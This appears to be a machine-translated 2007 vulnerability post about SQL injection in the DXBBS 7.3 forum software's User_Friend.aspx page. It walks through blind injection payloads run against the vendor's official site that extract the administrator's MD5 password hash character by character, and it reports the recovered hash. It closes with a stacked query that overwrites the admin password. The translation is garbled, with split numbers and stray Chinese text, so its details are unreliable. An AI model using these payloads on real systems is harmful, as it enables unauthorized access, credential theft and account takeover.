dxbbs vulnerability(through the kill 7. 3 all previous version)-bug warning-the black bar safety net

2007-04-27T00:00:00
ID MYHACK58:62200715243
Type myhack58
Reporter 佚名
Modified 2007-04-27T00:00:00

Description

The vulnerability appears in the User_Friend. aspx , since the filter is not strict, resulting in the name allow the injection, not much to say, see for yourself. ------------------------------------------------------------------------------------------- http://www.dxbbs.cn/

This is DXBBS official website, the version is 7. 3, with the access database

In the User_Friend. aspx to filter a=Add&Name=admin add"

A typical filter is not strict,as is the access,in the absence of the tool case, can only be a guess.

The default administrator is admin, we have to guess the admin Password, tools is the Veteran's injected into the browser, using the asc conversion guess the solution, I have downloaded a copy of the source code, you can look at the database structure

User table:DXBBS_user Password field:user_pass

http://www.dxbbs.cn/User_F... 过滤 了 =Add&Name=admin" {v} and "a"="a, because the back there is a single quote, no way to comment, so the only way to construct injected into the statement that{v}is a variable

First use the statement to determine the length of the password and (select top 1 len(user_pass) from DXBBS_user)=1 6 Returns: the buddy already exists Description The password is indeed the 1 6-bit, after MD5 encryption

Next guess is the decryption code: Guess understand the first bit: and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=5 7 returns: the data does not exist, the guess error, indicating the password the first digit of the ASC value is less than 5 7

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=5 5 Correct, the description of the password the first digit of the ASC value is greater than or equal to 5 of 5

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=5 6 Returns an error, indicating the password the first digit of the ASC value is greater than less than 5 6

Since is greater than or equal to 5 5 less than 5 6, then this value is 5 of 5, ASC55 the corresponding character is:7,that is, the password of the first bit is 7,

Guess the password the second is to put and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=5 7 Changed and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name="admin")>=5 7

Back and so on

After 5 minutes give the administrator password: 74e92e9ececa0ae7

This is the MD5 encrypted, as to how to get plain text, don't ask me, your luck.

The following describes the SQL version using the method: ser_Friend. aspx to filter a=Add&Name=big Cicada;Update [Dxbbs_user] set user_pass="7a57a5a743894a0e" where user_name="admin";--